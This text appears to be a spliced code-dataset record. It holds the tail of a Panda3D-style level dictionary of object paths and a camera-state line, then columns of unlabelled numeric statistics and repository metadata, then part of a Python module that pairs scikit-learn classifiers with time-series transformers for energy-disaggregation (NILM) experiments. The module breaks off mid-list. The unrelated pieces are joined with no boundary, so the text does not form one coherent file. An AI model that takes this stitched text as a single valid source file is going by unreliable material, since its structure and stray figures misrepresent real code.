'["Objects"]["1235605888.0akelts"]["Objects"]["1235611781.22akelts"]["Objects"]["1235611781.23akelts"]','1235611782.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611782.08akelts"]','1235611782.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611782.08akelts"]["Objects"]["1235611782.09akelts"]','1235611783.02akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1235611783.02akelts"]','1235611783.0akelts': 
'["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]','1235611783.89akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.89akelts"]','1235611783.91akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.89akelts"]["Objects"]["1235611783.91akelts"]','1235611784.77akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611784.77akelts"]','1235611784.78akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611784.77akelts"]["Objects"]["1235611784.78akelts"]','1235611785.67akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611785.67akelts"]','1235611785.69akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611785.67akelts"]["Objects"]["1235611785.69akelts"]','1235611786.56akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611786.56akelts"]','1235611786.58akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611786.56akelts"]["Objects"]["1235611786.58akelts"]','1235611787.47akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]','1235611787.48akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1235611787.48akelts"]','1235611788.39akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]','1235611788.41akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]["Objects"]["1235611788.41akelts"]','1235611789.31akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611789.31akelts"]','1235611789.33akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611789.31akelts"]["Objects"]["1235611789.33akelts"]','1235611790.25akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611790.25akelts"]','1235611790.27akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611790.25akelts"]["Objects"]["1235611790.27akelts"]','1235611791.19akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]','1235611791.2akelts': 
'["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1235611791.2akelts"]','1235611792.13akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]','1235611792.14akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1235611792.14akelts"]','1235611793.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]','1235611793.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]["Objects"]["1235611793.09akelts"]','1235611794.03akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611794.03akelts"]','1235611794.05akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611794.03akelts"]["Objects"]["1235611794.05akelts"]','1235611795.02akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.0akelts"]["Objects"]["1235611795.02akelts"]','1235611795.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.0akelts"]','1235611795.97akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]','1235611795.98akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1235611795.98akelts"]','1235611804.13akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1235611804.13akelts"]','1235611815.78akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611775.94akelts"]["Objects"]["1235611815.78akelts"]','1235611825.73akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1235611825.73akelts"]','1235611825.75akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1235611825.75akelts"]','1235611842.06akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611777.48akelts"]["Objects"]["1235611842.06akelts"]','1235611842.09akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611777.48akelts"]["Objects"]["1235611842.09akelts"]','1235611856.48akelts': 
'["Objects"]["1235605888.0akelts"]["Objects"]["1235611784.77akelts"]["Objects"]["1235611856.48akelts"]','1235611872.81akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611782.08akelts"]["Objects"]["1235611872.81akelts"]','1235611883.44akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1235611883.44akelts"]','1235611883.47akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1235611883.47akelts"]','1235611892.27akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.89akelts"]["Objects"]["1235611892.27akelts"]','1235611907.05akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611786.56akelts"]["Objects"]["1235611907.05akelts"]','1235611917.53akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]["Objects"]["1235611917.53akelts"]','1235611917.55akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]["Objects"]["1235611917.55akelts"]','1235611926.59akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611789.31akelts"]["Objects"]["1235611926.59akelts"]','1235611941.53akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611790.25akelts"]["Objects"]["1235611941.53akelts"]','1235611955.27akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1235611955.27akelts"]','1235611967.94akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1235611967.94akelts"]','1235611988.31akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]["Objects"]["1235611988.31akelts"]','1235686400.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611353.63akelts"]["Objects"]["1235686400.0akelts1"]','1236212352.0akelts2': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1236212352.0akelts2"]','1236212352.0akelts3': 
'["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1236212352.0akelts3"]','1236212352.0akelts4': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1236212352.0akelts4"]','1236212480.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]["Objects"]["1236212480.0akelts1"]','1236292864.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236292864.0akelts"]','1236293632.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts"]','1236293632.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts"]["Objects"]["1236293632.0akelts0"]','1236293632.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts"]["Objects"]["1236293632.0akelts1"]','1236293632.0akelts2': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts2"]','1236293632.0akelts3': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts2"]["Objects"]["1236293632.0akelts3"]','1236294016.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts"]["Objects"]["1236294016.0akelts"]','1237573872.64akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611116.59akelts"]["Objects"]["1237573872.64akelts"]','1237573913.83akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611116.59akelts"]["Objects"]["1237573872.64akelts"]["Objects"]["1237573913.83akelts"]','1237573940.19akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts2"]["Objects"]["1237573940.19akelts"]','1237573962.13akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1236293632.0akelts2"]["Objects"]["1237573940.19akelts"]["Objects"]["1237573962.13akelts"]','1237574022.48akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1237574022.48akelts"]','1237574300.08akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1237574300.08akelts"]','1237582208.0akelts': 
'["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.02akelts"]["Objects"]["1237582208.0akelts"]','1237582592.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1237582592.0akelts"]','1237582592.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611792.13akelts"]["Objects"]["1237582592.0akelts0"]','1237583616.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1237583616.0akelts"]','1237583616.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611791.19akelts"]["Objects"]["1237583616.0akelts0"]','1237583744.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611793.08akelts"]["Objects"]["1237583744.0akelts"]','1237583872.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1237583872.0akelts"]','1237583872.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.89akelts"]["Objects"]["1237583872.0akelts0"]','1237584000.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1237584000.0akelts"]','1237584000.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1237584000.0akelts0"]','1237584256.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1237584256.0akelts"]','1237584256.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1237584256.0akelts0"]','1237584256.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1237584256.0akelts1"]','1237584384.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611529.42akelts"]["Objects"]["1237584384.0akelts"]','1237584384.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.78akelts"]["Objects"]["1237584384.0akelts0"]','1237584512.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1237584512.0akelts"]','1237587968.0akelts': 
'["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1237587968.0akelts"]','1237588608.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611121.0akelts"]["Objects"]["1237588608.0akelts"]','1237588864.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1237588864.0akelts"]','1237588864.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1237588864.0akelts0"]','1237590784.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611035.98akelts"]["Objects"]["1237590784.0akelts"]','1237590912.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]["Objects"]["1237590912.0akelts"]','1237591040.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611519.63akelts"]["Objects"]["1237591040.0akelts"]','1237593600.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611788.39akelts"]["Objects"]["1237593600.0akelts"]','1237593728.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611786.56akelts"]["Objects"]["1237593728.0akelts"]','1237593856.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611783.0akelts"]["Objects"]["1237593856.0akelts0"]','1237593984.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1237593984.0akelts"]','1237593984.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1237593984.0akelts0"]','1237593984.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611787.47akelts"]["Objects"]["1237593984.0akelts1"]','1237594112.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611777.48akelts"]["Objects"]["1237594112.0akelts"]','1237594112.0akelts0': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611775.94akelts"]["Objects"]["1237594112.0akelts0"]','1237594240.0akelts0': 
'["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1237594240.0akelts0"]','1237594240.0akelts1': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1237594240.0akelts1"]','1237594240.0akelts2': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611795.97akelts"]["Objects"]["1237594240.0akelts2"]','1237594368.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611117.31akelts"]["Objects"]["1237594368.0akelts"]','1237595008.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.78akelts"]["Objects"]["1237595008.0akelts"]','1237595136.0akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611528.78akelts"]["Objects"]["1237595136.0akelts"]','1237827026.68akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1237827026.68akelts"]','1237827053.79akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]["Objects"]["1237827053.79akelts"]','1237827104.49akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611534.09akelts"]["Objects"]["1237827104.49akelts"]','1237827147.39akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611120.45akelts"]["Objects"]["1237827147.39akelts"]','1237827221.59akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]["Objects"]["1237827221.59akelts"]','1237827472.21akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611352.94akelts"]["Objects"]["1237827472.21akelts"]','1237827511.65akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611353.63akelts"]["Objects"]["1237827511.65akelts"]','1237827546.46akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611353.63akelts"]["Objects"]["1237827546.46akelts"]','1237827576.62akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1237827576.62akelts"]','1237828348.45akelts': 
'["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.06akelts"]["Objects"]["1237828348.45akelts"]','1237828366.56akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611532.06akelts"]["Objects"]["1237828366.56akelts"]','1237828412.73akelts': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611746.08akelts"]["Objects"]["1237828412.73akelts"]','1238121988.24kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.08akelts"]["Objects"]["1238121988.24kmuller"]','1238122156.47kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238122156.47kmuller"]','1238122175.84kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611519.63akelts"]["Objects"]["1238122175.84kmuller"]','1238122450.62kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1238122450.62kmuller"]','1238122549.4kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1238122549.4kmuller"]','1238122886.85kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238122886.85kmuller"]','1238123063.16kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.08akelts"]["Objects"]["1238123063.16kmuller"]','1238123123.41kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611519.63akelts"]["Objects"]["1238123123.41kmuller"]','1238123165.21kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238123165.21kmuller"]','1238123189.34kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]["Objects"]["1238123189.34kmuller"]','1238123307.1kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238123307.1kmuller"]','1238123315.1kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238123315.1kmuller"]','1238123329.65kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.91akelts"]["Objects"]["1238123329.65kmuller"]','1238123885.11kmuller': 
'["Objects"]["1235605888.0akelts"]["Objects"]["1235611120.45akelts"]["Objects"]["1238123885.11kmuller"]','1238124363.02kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124363.02kmuller"]','1238124386.78kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1238124386.78kmuller"]','1238124424.97kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124424.97kmuller"]','1238124454.94kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124454.94kmuller"]','1238124512.89kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124512.89kmuller"]','1238124542.84kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124542.84kmuller"]','1238124581.13kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124581.13kmuller"]','1238124674.48kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611361.5akelts"]["Objects"]["1238124674.48kmuller"]','1238125045.1kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1238125045.1kmuller"]','1238125152.02kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611530.73akelts"]["Objects"]["1238125152.02kmuller"]','1238128143.19kmuller': '["Objects"]["1235605888.0akelts"]["Objects"]["1235611119.33akelts"]["Objects"]["1238128143.19kmuller"]'}}
# Auto-generated viewer/scene state captured with this level dump.
# NOTE(review): Point3/VBase3 look like Panda3D vector types and
# camPos/camHpr like camera position and heading-pitch-roll — confirm
# against the tool that wrote this file before relying on the semantics.
extraInfo = {'camPos': Point3(-161.645, 61.3813, 241.156),'camHpr': VBase3(-78.9347, -5.84403, 0),'focalLength': 1.39999997616,'skyState': 16,'fog': 1}
| 45,375
| 135,920
| 0.699196
| 17,042
| 136,125
| 5.517193
| 0.052165
| 0.028099
| 0.03012
| 0.025908
| 0.681954
| 0.638167
| 0.523739
| 0.430167
| 0.342455
| 0.302444
| 0
| 0.352443
| 0.045987
| 136,125
| 3
| 135,921
| 45,375
| 0.37157
| 0
| 0
| 0
| 0
| 0.666667
| 0.677174
| 0.23537
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
bf7d9ff7ac1cfd9f8b3164f0e775194718b6b15c
| 46,320
|
py
|
Python
|
nilmlab/exp_model_list.py
|
ChristoferNal/multi-nilm
|
0ec1d1a834b04da121963bf82eb0f540d76a8409
|
[
"MIT"
] | 32
|
2020-04-29T07:03:08.000Z
|
2021-12-21T02:24:43.000Z
|
nilmlab/exp_model_list.py
|
qiu-2020/multi-nilm
|
0ec1d1a834b04da121963bf82eb0f540d76a8409
|
[
"MIT"
] | 3
|
2020-10-23T07:26:42.000Z
|
2021-09-30T11:07:10.000Z
|
nilmlab/exp_model_list.py
|
qiu-2020/multi-nilm
|
0ec1d1a834b04da121963bf82eb0f540d76a8409
|
[
"MIT"
] | 10
|
2020-05-31T02:02:32.000Z
|
2022-02-10T01:42:37.000Z
|
from sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.neural_network import MLPClassifier
from sklearn.tree import ExtraTreeClassifier
from skmultilearn.adapt import MLkNN
from skmultilearn.ensemble import RakelD
from datasources.paths_manager import SAVED_MODEL, PATH_SIGNAL2VEC
from nilmlab.factories import TransformerFactory
from nilmlab.lab import TransformerType
# String keys used by the experiment-definition dictionaries below.
# Representation techniques (names match the TransformerFactory builders used
# later in this module):
SAX = "SAX"              # Symbolic Aggregate approXimation (tslearn)
SAX1D = "SAX1D"          # 1d-SAX variant (tslearn)
SFA = "SFA"              # Symbolic Fourier Approximation (pyts)
DFT = "DFT"              # Discrete Fourier Transform coefficients (pyts)
PAA = "PAA"              # Piecewise Aggregate Approximation (tslearn)
WEASEL = "WEASEL"        # WEASEL bag-of-patterns (pyts)
SIGNAL2VEC = "SIGNAL2VEC"
BOSS = "BOSS"            # Bag-of-SFA-Symbols (pyts)
TIME_DELAY_EMBEDDING = "TIME_DELAY_EMBEDDING"
WAVELETS = "WAVELETS"
# Keys selecting one of the two parallel lists inside each representation's
# entry: classifiers vs. their paired time-series transformers.
TRANSFORMER_MODELS = "TRANSFORMER_MODELS"
CLF_MODELS = "CLF_MODELS"
# Best (classifier, transformer) pair per representation for a 10-minute
# window: CLF_MODELS[i] is the classifier evaluated with TRANSFORMER_MODELS[i].
# Fix: hidden_layer_sizes=(2000) was a parenthesized int, not a tuple; the
# intended single 2000-unit hidden layer is now written (2000,).  sklearn
# wraps a scalar internally, so the trained network is unchanged.
selected_models_10mins = {
    BOSS: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_boss(word_size=4, n_bins=20, window_size=10, norm_mean=False,
                                               norm_std=False)
        ]
    },
    SIGNAL2VEC: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=1)
        ]
    },
    PAA: {
        CLF_MODELS: [
            ExtraTreesClassifier(n_jobs=-1, n_estimators=500)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
        ]
    },
    DFT: {
        CLF_MODELS: [
            ExtraTreesClassifier(n_jobs=-1, n_estimators=500)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
                                              supports_approximation=True)
        ]
    },
    SFA: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000, 100, 100), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=5, norm_mean=False, norm_std=False)
        ]
    },
    SAX1D: {
        CLF_MODELS: [
            RandomForestClassifier(n_jobs=-1, n_estimators=100)
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10)
        ]
    },
    SAX: {
        CLF_MODELS: [
            MLPClassifier(hidden_layer_sizes=(2000,), learning_rate='adaptive', solver='adam')
        ],
        TRANSFORMER_MODELS: [
            TransformerFactory.build_tslearn_sax(n_paa_segments=50, n_sax_symbols=50, supports_approximation=True)
        ]
    }
}
# Best (classifier, transformer) pairs per representation for a 4-hour
# window: CLF_MODELS[i] was evaluated together with TRANSFORMER_MODELS[i]
# (four ranked experiment configurations per representation).
selected_models_4h = {
BOSS : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100, 100), learning_rate='adaptive', solver='adam',
activation='logistic')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_boss(word_size=2, n_bins=26, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=25, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=26, window_size=10, norm_mean=False,
norm_std=False),
TransformerFactory.build_pyts_boss(word_size=2, n_bins=26, window_size=10, norm_mean=False,
norm_std=False)
]
},
SIGNAL2VEC: {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam',
activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam'),
],
TRANSFORMER_MODELS: [
# num_of_vectors controls how many signal2vec embeddings represent a window.
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=5),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=10),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=10),
TransformerFactory.build_signal2vec(SAVED_MODEL, PATH_SIGNAL2VEC, num_of_vectors=10)
]
},
WEASEL : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam', activation='logistic'),
MLPClassifier(hidden_layer_sizes=(100, 100, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_weasel(word_size=2, n_bins=4, norm_mean=False, norm_std=False)
]
},
PAA : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=200),
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=500)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True),
TransformerFactory.build_tslearn_paa(n_paa_segments=10, supports_approximation=True)
]
},
DFT : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=200),
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=500)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True),
TransformerFactory.build_pyts_dft(n_coefs=10, norm_mean=False, norm_std=False,
supports_approximation=True)
]
},
SFA : {
CLF_MODELS : [
ExtraTreesClassifier(n_jobs=-1, n_estimators=500),
ExtraTreesClassifier(n_jobs=-1, n_estimators=2000),
ExtraTreesClassifier(n_jobs=-1, n_estimators=1000),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam'),
],
TRANSFORMER_MODELS: [
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=9, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=9, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=9, norm_mean=False, norm_std=False),
TransformerFactory.build_pyts_sfa(n_coefs=10, n_bins=9, norm_mean=False, norm_std=False)
]
},
SAX1D : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam'),
ExtraTreeClassifier(),
ExtraTreeClassifier(),
ExtraTreesClassifier(n_jobs=-1, n_estimators=100)
],
TRANSFORMER_MODELS: [
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=20),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=10),
TransformerFactory.build_tslearn_one_d_sax(n_paa_segments=50, n_sax_symbols=50)
]
},
SAX : {
CLF_MODELS : [
MLPClassifier(hidden_layer_sizes=(1000,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(100,), learning_rate='adaptive', solver='adam'),
MLPClassifier(hidden_layer_sizes=(1000, 100), learning_rate='adaptive', solver='adam')
],
TRANSFORMER_MODELS: [
